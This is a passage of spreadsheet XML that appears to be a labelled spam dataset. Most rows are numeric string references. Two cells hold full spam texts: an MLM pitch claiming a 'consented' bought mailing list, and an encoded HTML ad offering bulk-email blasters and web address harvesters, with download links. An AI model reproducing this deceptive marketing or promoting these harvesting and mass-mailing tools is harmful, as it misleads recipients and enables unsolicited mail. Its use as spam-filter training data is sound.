    </row>
    <row r="1736" hidden="1">
      <c r="A1736" s="1">
        <v>1734.0</v>
      </c>
      <c r="B1736" s="1" t="s">
        <v>910</v>
      </c>
      <c r="C1736" s="1" t="s">
        <v>2961</v>
      </c>
      <c r="D1736" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1737" hidden="1">
      <c r="A1737" s="1">
        <v>1735.0</v>
      </c>
      <c r="B1737" s="1" t="s">
        <v>2962</v>
      </c>
      <c r="C1737" s="1" t="s">
        <v>2963</v>
      </c>
      <c r="D1737" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1738" hidden="1">
      <c r="A1738" s="1">
        <v>1736.0</v>
      </c>
      <c r="B1738" s="1" t="s">
        <v>2964</v>
      </c>
      <c r="C1738" s="1" t="s">
        <v>2965</v>
      </c>
      <c r="D1738" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1739" hidden="1">
      <c r="A1739" s="1">
        <v>1737.0</v>
      </c>
      <c r="B1739" s="1" t="s">
        <v>2966</v>
      </c>
      <c r="C1739" s="1" t="s">
        <v>2967</v>
      </c>
      <c r="D1739" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1740" hidden="1">
      <c r="A1740" s="1">
        <v>1738.0</v>
      </c>
      <c r="B1740" s="1" t="s">
        <v>1906</v>
      </c>
      <c r="C1740" s="1" t="s">
        <v>2968</v>
      </c>
      <c r="D1740" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1741" hidden="1">
      <c r="A1741" s="1">
        <v>1739.0</v>
      </c>
      <c r="B1741" s="1" t="s">
        <v>2969</v>
      </c>
      <c r="C1741" s="1" t="s">
        <v>2970</v>
      </c>
      <c r="D1741" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1742" hidden="1">
      <c r="A1742" s="1">
        <v>1740.0</v>
      </c>
      <c r="B1742" s="1" t="s">
        <v>2971</v>
      </c>
      <c r="C1742" s="1" t="s">
        <v>2972</v>
      </c>
      <c r="D1742" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1743" hidden="1">
      <c r="A1743" s="1">
        <v>1741.0</v>
      </c>
      <c r="B1743" s="1" t="s">
        <v>2973</v>
      </c>
      <c r="C1743" s="1" t="s">
        <v>2974</v>
      </c>
      <c r="D1743" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1744" hidden="1">
      <c r="A1744" s="1">
        <v>1742.0</v>
      </c>
      <c r="B1744" s="1" t="s">
        <v>2975</v>
      </c>
      <c r="C1744" s="1" t="s">
        <v>2976</v>
      </c>
      <c r="D1744" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1745" hidden="1">
      <c r="A1745" s="1">
        <v>1743.0</v>
      </c>
      <c r="B1745" s="1" t="s">
        <v>2977</v>
      </c>
      <c r="C1745" s="1" t="s">
        <v>2978</v>
      </c>
      <c r="D1745" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1746" hidden="1">
      <c r="A1746" s="1">
        <v>1744.0</v>
      </c>
      <c r="B1746" s="1" t="s">
        <v>2979</v>
      </c>
      <c r="C1746" s="1" t="s">
        <v>2980</v>
      </c>
      <c r="D1746" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1747">
      <c r="A1747" s="1">
        <v>1745.0</v>
      </c>
      <c r="B1747" s="1" t="s">
        <v>2981</v>
      </c>
      <c r="C1747" s="1" t="s">
        <v>2982</v>
      </c>
      <c r="D1747" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1748" hidden="1">
      <c r="A1748" s="1">
        <v>1746.0</v>
      </c>
      <c r="B1748" s="1" t="s">
        <v>2983</v>
      </c>
      <c r="C1748" s="1" t="s">
        <v>2984</v>
      </c>
      <c r="D1748" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1749">
      <c r="A1749" s="1">
        <v>1747.0</v>
      </c>
      <c r="B1749" s="1" t="s">
        <v>2985</v>
      </c>
      <c r="C1749" s="1" t="s">
        <v>2986</v>
      </c>
      <c r="D1749" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1750" hidden="1">
      <c r="A1750" s="1">
        <v>1748.0</v>
      </c>
      <c r="B1750" s="1" t="s">
        <v>464</v>
      </c>
      <c r="C1750" s="1" t="s">
        <v>2987</v>
      </c>
      <c r="D1750" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1751" hidden="1">
      <c r="A1751" s="1">
        <v>1749.0</v>
      </c>
      <c r="B1751" s="1" t="s">
        <v>204</v>
      </c>
      <c r="C1751" s="1" t="s">
        <v>2988</v>
      </c>
      <c r="D1751" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1752" hidden="1">
      <c r="A1752" s="1">
        <v>1750.0</v>
      </c>
      <c r="B1752" s="1" t="s">
        <v>2989</v>
      </c>
      <c r="C1752" s="1" t="s">
        <v>2990</v>
      </c>
      <c r="D1752" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1753" hidden="1">
      <c r="A1753" s="1">
        <v>1751.0</v>
      </c>
      <c r="B1753" s="1" t="s">
        <v>303</v>
      </c>
      <c r="C1753" s="1" t="s">
        <v>2991</v>
      </c>
      <c r="D1753" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1754" hidden="1">
      <c r="A1754" s="1">
        <v>1752.0</v>
      </c>
      <c r="B1754" s="1" t="s">
        <v>2801</v>
      </c>
      <c r="C1754" s="1" t="s">
        <v>2992</v>
      </c>
      <c r="D1754" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1755" hidden="1">
      <c r="A1755" s="1">
        <v>1753.0</v>
      </c>
      <c r="B1755" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C1755" s="1" t="s">
        <v>2993</v>
      </c>
      <c r="D1755" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1756" hidden="1">
      <c r="A1756" s="1">
        <v>1754.0</v>
      </c>
      <c r="B1756" s="1" t="s">
        <v>2994</v>
      </c>
      <c r="C1756" s="1" t="s">
        <v>2995</v>
      </c>
      <c r="D1756" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1757">
      <c r="A1757" s="1">
        <v>1755.0</v>
      </c>
      <c r="B1757" s="1" t="s">
        <v>2996</v>
      </c>
      <c r="C1757" s="1" t="s">
        <v>2997</v>
      </c>
      <c r="D1757" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1758">
      <c r="A1758" s="1">
        <v>1756.0</v>
      </c>
      <c r="B1758" s="1" t="s">
        <v>1634</v>
      </c>
      <c r="C1758" s="1" t="s">
        <v>1635</v>
      </c>
      <c r="D1758" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1759">
      <c r="A1759" s="1">
        <v>1757.0</v>
      </c>
      <c r="B1759" s="1" t="s">
        <v>2998</v>
      </c>
      <c r="C1759" s="1" t="s">
        <v>2999</v>
      </c>
      <c r="D1759" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1760" hidden="1">
      <c r="A1760" s="1">
        <v>1758.0</v>
      </c>
      <c r="B1760" s="1" t="s">
        <v>2238</v>
      </c>
      <c r="C1760" s="1" t="s">
        <v>3000</v>
      </c>
      <c r="D1760" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1761">
      <c r="A1761" s="1">
        <v>1759.0</v>
      </c>
      <c r="B1761" s="1" t="s">
        <v>3001</v>
      </c>
      <c r="C1761" s="1" t="s">
        <v>3002</v>
      </c>
      <c r="D1761" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1762" hidden="1">
      <c r="A1762" s="1">
        <v>1760.0</v>
      </c>
      <c r="B1762" s="1" t="s">
        <v>3003</v>
      </c>
      <c r="C1762" s="1" t="s">
        <v>3004</v>
      </c>
      <c r="D1762" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1763" hidden="1">
      <c r="A1763" s="1">
        <v>1761.0</v>
      </c>
      <c r="B1763" s="1" t="s">
        <v>3005</v>
      </c>
      <c r="C1763" s="1" t="s">
        <v>3006</v>
      </c>
      <c r="D1763" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1764" hidden="1">
      <c r="A1764" s="1">
        <v>1762.0</v>
      </c>
      <c r="B1764" s="1" t="s">
        <v>1844</v>
      </c>
      <c r="C1764" s="1" t="s">
        <v>1845</v>
      </c>
      <c r="D1764" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1765" hidden="1">
      <c r="A1765" s="1">
        <v>1763.0</v>
      </c>
      <c r="B1765" s="1" t="s">
        <v>2475</v>
      </c>
      <c r="C1765" s="1" t="s">
        <v>3007</v>
      </c>
      <c r="D1765" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1766" hidden="1">
      <c r="A1766" s="1">
        <v>1764.0</v>
      </c>
      <c r="B1766" s="1" t="s">
        <v>3008</v>
      </c>
      <c r="C1766" s="1" t="s">
        <v>3009</v>
      </c>
      <c r="D1766" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1767" hidden="1">
      <c r="A1767" s="1">
        <v>1765.0</v>
      </c>
      <c r="B1767" s="1" t="s">
        <v>3010</v>
      </c>
      <c r="C1767" s="1" t="s">
        <v>3011</v>
      </c>
      <c r="D1767" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1768" hidden="1">
      <c r="A1768" s="1">
        <v>1766.0</v>
      </c>
      <c r="B1768" s="1" t="s">
        <v>95</v>
      </c>
      <c r="C1768" s="1" t="s">
        <v>3012</v>
      </c>
      <c r="D1768" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1769" hidden="1">
      <c r="A1769" s="1">
        <v>1767.0</v>
      </c>
      <c r="B1769" s="1" t="s">
        <v>12</v>
      </c>
      <c r="C1769" s="1" t="s">
        <v>13</v>
      </c>
      <c r="D1769" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1770">
      <c r="A1770" s="1">
        <v>1768.0</v>
      </c>
      <c r="B1770" s="1" t="s">
        <v>3013</v>
      </c>
      <c r="C1770" s="3" t="str">
        <f>===============This Is Definitely the Answer We All Have Been Waiting For===============
 Every once in awhile, something comes along that you just know, from the people involved, from the features, or just from gut-feeling, that it's going to be very special, something with huge potential and hope. When you know it, it rests deep in your bones, and it's hard not to get overly excited and scream it to the world, which is why I'm writing you today. Although this program is launching with all the potential of being as big as anything on the Internet, and you will soon see it advertised and promoted everywhere you go, I would like to give you an opportunity to get in early before the masses. Traditionally, there have been a couple of flaws to any MLM (multi-level marketing for you newcomers) that have made it difficult for programs to last after the initial hoopla. Today, we have launched the solution to those problems, the newest and most innovative system ever to hit Multi-level Marketing. With a new software system and an ingenious payplan, combined with a 100% payout, everyone comes out a winner. 
 The truth is, you've got to see it to believe it, so rather than feed you a lot of hype and tell you this is the miracle you've been looking for, the magic link that will end all your problems, or a lot of other things you don't need to hear, I'm just going to make you a very simple offer. Email me with 'Send Link' in the subject line to:  itshappening@mail2world.com  and I will provide the link so you can take a test drive, absolutely risk-free. You can get a birds-eye inside look, revealing the inner-workings of this revolutionary new discovery in online income opportunities. Should you decide you like what you see, you will have the option of activating your position, but that is completely at your option. This isn't a trick, I'm just so convinced that this is such a sound program and unique but solid opportunity that I don't want you to miss out on the chance to get an early position. With an explosive launch, positions will be filling up rapidly, and you have before you a chance to explore the program before diving in head first. If you're one of those cautious people (and who isn't these days on the Internet), that likes to "look before you leap" then here is your chance. Thank you for your time, and I hope you discover why we're all smiling!!
 Please do not treat this message as spam. I am a professional and very successful networker with a data base of 100,000. I was pursueded to purchase this list containing 200,000 names of individuals, which is guaranteed to include only those people who have given their consent to receive information. I have not used this means of marketing before and frankly I am dubious about its validity. However, having spent an arm and a leg purchasing it I'm initially sending this message to just a small number of the email address's (2,000) to guage results. If you want more information I will happily supply the link without any obligation. But if its of no interest or you take exception to receiving this mail then please accept my apologies for the intrusion and delete the message immediately. As this is a one time mailing there is no need to respond with 'remove'. Thank you. 
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D1770" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1771">
      <c r="A1771" s="1">
        <v>1769.0</v>
      </c>
      <c r="B1771" s="1" t="s">
        <v>3014</v>
      </c>
      <c r="C1771" s="1" t="s">
        <v>3015</v>
      </c>
      <c r="D1771" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1772" hidden="1">
      <c r="A1772" s="1">
        <v>1770.0</v>
      </c>
      <c r="B1772" s="1" t="s">
        <v>3016</v>
      </c>
      <c r="C1772" s="1" t="s">
        <v>3017</v>
      </c>
      <c r="D1772" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1773" hidden="1">
      <c r="A1773" s="1">
        <v>1771.0</v>
      </c>
      <c r="B1773" s="1" t="s">
        <v>3018</v>
      </c>
      <c r="C1773" s="1" t="s">
        <v>3019</v>
      </c>
      <c r="D1773" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1774">
      <c r="A1774" s="1">
        <v>1772.0</v>
      </c>
      <c r="B1774" s="1" t="s">
        <v>3020</v>
      </c>
      <c r="C1774" s="1" t="s">
        <v>3021</v>
      </c>
      <c r="D1774" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1775">
      <c r="A1775" s="1">
        <v>1773.0</v>
      </c>
      <c r="B1775" s="1" t="s">
        <v>3022</v>
      </c>
      <c r="C1775" s="3" t="str">
        <f>3CBODY bgColor=3D#ffffff=3E
 =3CDIV=3E=3CFONT size=3D2=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CDIV=3E&amp;nbsp=3B=3C=2FDIV=3E
 =3CDIV=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial size=3D4=3EDirect Email 
 Blaster=3C=2FFONT=3E=3C=2FSTRONG=3E =3C=2FDIV=3E=3CFONT size=3D2=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CB=3E=3CFONT color=3D#006600=3E=3CI=3EThe program will send mail at the 
 rate of over 1=2C 000 e-mails per minute=2E&amp;nbsp=3B=3C=2FI=3E=3C=2FFONT=3E=3CBR=3ELegal and Fast 
 sending bulk emails&amp;nbsp=3B=3CBR=3E=3CFONT color=3D#006600=3E=3CI=3EBuilt in SMTP 
 server&amp;nbsp=3B=3C=2FI=3E=3C=2FFONT=3E=3CBR=3EHave Return Path&amp;nbsp=3B=3CBR=3ECan Check Mail 
 Address&amp;nbsp=3B=3CBR=3E=3CFONT color=3D#006600=3E=3CI=3EMake Error Send Address List=28 Remove or 
 Send Again=29&amp;nbsp=3B=3C=2FI=3E=3C=2FFONT=3E=3CBR=3ESupport multi-threads=2E&amp;nbsp=3B=3CBR=3ESupport 
 multi-smtp servers=2E&amp;nbsp=3B=3CBR=3EManages your opt-in E-Mail Lists&amp;nbsp=3B=3CBR=3EOffers an 
 easy-to-use interface!&amp;nbsp=3B=3CBR=3EEasy to configure and use&amp;nbsp=3B=3C=2FB=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CA 
 href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Fedeb=5Fset=2Ezip=22=3E=3CSTRONG=3EDownload 
 Now=3C=2FSTRONG=3E=3C=2FA=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial size=3D4=3EMaillist 
 Verify=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3EMaillist Verify is intended for e-mail addresses and mail 
 lists verifying=2E The main task is to determine which of addresses in the mail 
 list are dead=2E The program is oriented=2C basically=2C on programmers which have 
 their own mail lists to inform their users about new versions of their 
 programs=2E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3EThe program works on the same algorithm as ISP mail systems 
 do=2E Mail servers addresses for specified address are extracted from DNS=2E The 
 program tries to connect with found SMTP-servers and simulates the sending of 
 message=2E It does not come to the message =3CNOBR=3Esending &amp;#8255=3B=2FNOBR&amp;gt=3B EMV disconnect 
 as soon as mail server informs does this address exist or not=2E EMV can 
 find=3C=2FNOBR=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CNOBR=3E&amp;nbsp=3Babout 90% of dead addresses &amp;#8255=3B=2FNOBR&amp;gt=3B some mail 
 systems receive all messages and only then see their&amp;nbsp=3B=3C=2FNOBR=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CNOBR=3Eaddresses and if the address is dead send the message 
 back with remark about it=2E=3C=2FNOBR=3E=3C=2FFONT=3E=3C=2FP=3E=3CNOBR=3E
 =3CP=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Fbemv=5Fset=2Ezip=22=3E=3CSTRONG=3E=3CFONT 
 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FA=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial size=3D4=3EExpress Email 
 Blaster&amp;nbsp=3B=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3EExpress Email Blaster&amp;nbsp=3B is a very fast=2C powerful yet 
 simple to use email sender=2E Utilizing multiple threads=2Fconnections=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E&amp;nbsp=3Band multiple SMTP servers your emails will be sent out 
 fast and easily=2E There are User Information=2C Attach Files=2C&amp;nbsp=3B=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3EAddress and Mail Logs four tabbed area for the E-mails 
 details for sending=2E About 25 SMTP servers come with the&amp;nbsp=3B=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3Edemo version=2C and users may Add and Delete SMTP servers=2E 
 About =3CFONT color=3D#008000=3E=3CB=3E60=2C000=3C=2FB=3E=3C=2FFONT=3E E-mails will be sent out per 
 hour=2E=22=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Fbeeb=5Fset=2Ezip=22=3E=3CFONT 
 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FA=3E=3C=2FSTRONG=3E=3C=2FP=3E
 =3CP=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial size=3D4=3EExpress Email Address 
 Extractor=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FP=3E=3CFONT size=3D4=3E
 =3CP=3E=3CFONT color=3D#008000 size=3D3=3EThis program is the most efficient=2C easy to use 
 email address collector available on the =3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CFONT color=3D#008000 size=3D3=3E&amp;nbsp=3Binternet! =3C=2FFONT=3E=3CFONT 
 color=3D#000000 size=3D3=3EBeijing Express Email Address Extractor =28ExpressEAE=29 is 
 designed to extract=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT color=3D#000000 size=3D3=3E&amp;nbsp=3Be-mail addresses from web-pages on the 
 Internet =28using HTTP protocols=29 =2EExpressEAE=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT color=3D#000000 size=3D3=3E&amp;nbsp=3Bsupports operation through many proxy-server 
 and works very fast=2C as it is able of&amp;nbsp=3B=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT color=3D#000000 size=3D3=3Eloading several pages simultaneously=2C and requires 
 very few resources=2E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT color=3D#000000 face=3DArial=3E=3CFONT size=3D3=3EWith it=2C you will be able 
 to=3C=2FFONT=3E=3CFONT size=3D2=3E =3C=2FFONT=3E=3CFONT size=3D3=3Euse targeted searches to crawl the 
 world wide web=2C extracting&amp;nbsp=3B=3C=2FFONT=3E=3C=2FFONT=3E 
 =3CP=3E=3CFONT color=3D#000000 face=3DArial size=3D3=3Ethousands of clean=2C fresh email 
 addresses=2E Ably Email address Extractor is unlike other&amp;nbsp=3B=3C=2FFONT=3E 
 =3CP=3E=3CFONT color=3D#000000 face=3DArial size=3D3=3Eaddress collecting programs=2C which 
 limit you to one or two search engines and are unable=3C=2FFONT=3E 
 =3CP=3E=3CFONT color=3D#000000 face=3DArial size=3D3=3E&amp;nbsp=3Bto do auto searches HUGE address=2E 
 Most of them collect a high percentage of incomplete=2C&amp;nbsp=3B=3C=2FFONT=3E 
 =3CP=3E=3CFONT color=3D#000000 face=3DArial size=3D3=3Eunusable addresses which will cause you 
 serious problems when using them in a mailing=2E&amp;nbsp=3B=3C=2FFONT=3E 
 =3CUL=3E
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EEasier to learn and use than any 
   other email address collector program available=2E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EAccesses eight search 
   engines&amp;nbsp=3B=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EAdd your own URLs to the list to be 
   searched=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial size=3D3=3E=3CFONT color=3D#008000=3ESupports operation through 
   =3C=2FFONT=3E=3CFONT color=3D#ff00ff=3Ea lot of=3C=2FFONT=3E=3CFONT color=3D#008000=3E proxy-server 
   and works very fast =28HTTP Proxy=29=3C=2FFONT=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EAble of loading several pages 
   simultaneously=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3ERequires very few resources=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3ETimeout feature allows user to limit 
   the amount of time crawling in dead sites and traps=2E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial size=3D3=3E=3CFONT color=3D#008000=3EEasy to make =3C=2FFONT=3E=3CFONT 
   color=3D#ff00ff=3EHuge=3C=2FFONT=3E=3CFONT color=3D#008000=3E address list=3C=2FFONT=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EPause=2Fcontinue extraction at any 
   time=2E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT color=3D#008000 face=3DArial size=3D3=3EAuto connection to the 
   Internet=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E
 =3CDIV=3E=3CSTRONG=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Feeae=5Fset=2Ezip=22=3E=3CFONT 
 color=3D#008000 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FA=3E=3C=2FSTRONG=3E =3C=2FDIV=3E
 =3CDIV=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial=3EExpress Email Address 
 Downloader=3C=2FFONT=3E=3C=2FSTRONG=3E =3C=2FDIV=3E
 =3CUL=3E
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#006600 size=3D2=3EExpressEAD&amp;nbsp=3B 
   =3C=2FFONT=3E=3CFONT color=3D#000000 size=3D2=3Eis a 32 bit Windows Program for e-mail 
   marketing=2E It is intended for easy and convenient=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#000000 size=3D2=3E&amp;nbsp=3Bsearch large 
   e-mail address lists from mail servers=2E The program can be operated 
   on&amp;nbsp=3B=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#000000 size=3D2=3EWindows 95=2F98=2FME=2F2000 
   and NT=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#006600 size=3D2=3EExpressEAD&amp;nbsp=3B 
   =3C=2FFONT=3E=3CFONT color=3D#000000 size=3D2=3Esupport multi-threads =28up to 1024 
   connections=29=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#006600 size=3D2=3EExpressEAD&amp;nbsp=3B 
   =3C=2FFONT=3E=3CFONT color=3D#000000 size=3D2=3Ehas the ability&amp;nbsp=3B to reconnect to the 
   mail server if the server has disconnected and&amp;nbsp=3B=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#000000 size=3D2=3Econtinue the searching 
   at the point where it has been interrupted=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#006600 size=3D2=3EExpressEAD&amp;nbsp=3B 
   =3C=2FFONT=3E=3CFONT color=3D#000000 size=3D2=3Ehas an ergonomic interface that is easy to 
   set up and simple to use=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT color=3D#008000 face=3DArial 
 size=3D4=3EFeatures=3A=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
 =3CUL type=3Ddisc=3E
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT face=3DArial size=3D2=3Esupport 
   multi-threads=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT face=3DArial size=3D2=3Eauto get smtp server 
   address=2Csupport multi-smtp servers=2E=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT face=3DArial size=3D2=3Eauto save&amp;nbsp=3B E-Mail 
   Lists=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E 
   =3CLI=3E=3CFONT face=3DArial=3E=3CSTRONG=3E=3CFONT face=3DArial size=3D2=3Eoffers an easy-to-use 
   interface!=3C=2FFONT=3E=3C=2FSTRONG=3E=3C=2FFONT=3E =3C=2FLI=3E=3C=2FUL=3E
 =3CDIV=3E=3CSTRONG=3E=3CA href=3D=22http=3A=2F=2Fwww=2Ewldinfo=2Ecom=2Fbj=5Fdownload=2Feead=5Fset=2Ezip=22=3E=3CFONT 
 color=3D#008000 face=3DArial size=3D3=3EDownload Now=3C=2FFONT=3E=3C=2FA=3E=3C=2FSTRONG=3E =3C=2FDIV=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CDIV=3E=3CSTRONG=3E=3CFONT color=3D#ff0080 face=3DArial=3EExpress Maillist 
 Manager=3C=2FFONT=3E=3C=2FSTRONG=3E =3C=2FDIV=3E
 =3CDIV=3E=3CFONT face=3DArial=3E&amp;nbsp=3B=3C=2FFONT=3E =3C=2FDIV=3E
 =3CDIV=3E=3CFONT size=3D2=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CFONT color=3Dblack size=3D3=3EThis program was designed to be a 
 complement to the =3C=2FFONT=3E=3CFONT color=3D#800080 size=3D3=3EDirect Email Blaster&amp;nbsp=3B 
 =3C=2FFONT=3E=3CFONT color=3Dblack size=3D3=3Eand =3C=2FFONT=3E=3CFONT color=3D#800080 size=3D3=3EEmail 
 Blaster =3C=2FFONT=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CFONT color=3Dblack size=3D3=3Esuite of bulk email software 
 programs=2E Its purpose is to organize your email lists in order to be 
 more&amp;nbsp=3B=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CFONT face=3DArial=3E=3CFONT color=3Dblack size=3D3=3Eeffective with your email marketing 
 campaign=2E Some of its features include=3A=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FP=3E
 =3CP=3E=3CB=3E=3CFONT color=3D#008000 face=3DArial=3E=3CFONT size=3D3=3E&amp;#8255=3BCombine several lists into 
 one file=2E=3C=2FFONT=3E=3CBR=3E=3CFONT size=3D3=3E&amp;#8255=3BSplit up larger lists to make them more 
 manageable=2E=3C=2FFONT=3E=3CBR=3E=3CFONT size=3D3=3E&amp;#8255=3BRemove addresses from file=2E=3C=2FFONT=3E=3CBR=3E=3CFONT 
 size=3D3=3E&amp;#8255=3BManual editing=2C adding=2C and deleting of addresses=2E=3C=2FFONT=3E=3CBR=3E=3CFONT 
 size=3D3=3E&amp;#8255=3BAbility to auto clean lists=2C that is=2C remove any duplicate or unwanted 
 addresses=2E=3C=2FFONT=3E=3CBR=3E=3CFONT size=3D3=3E&amp;#8255=3BMaintain all your address lists within the 
 program so you no&amp;nbsp=3B longer need to keep all your=3C=2FFONT=3E=3C=2FFONT=3E=3C=2FB=3E=3C=2FP=3E
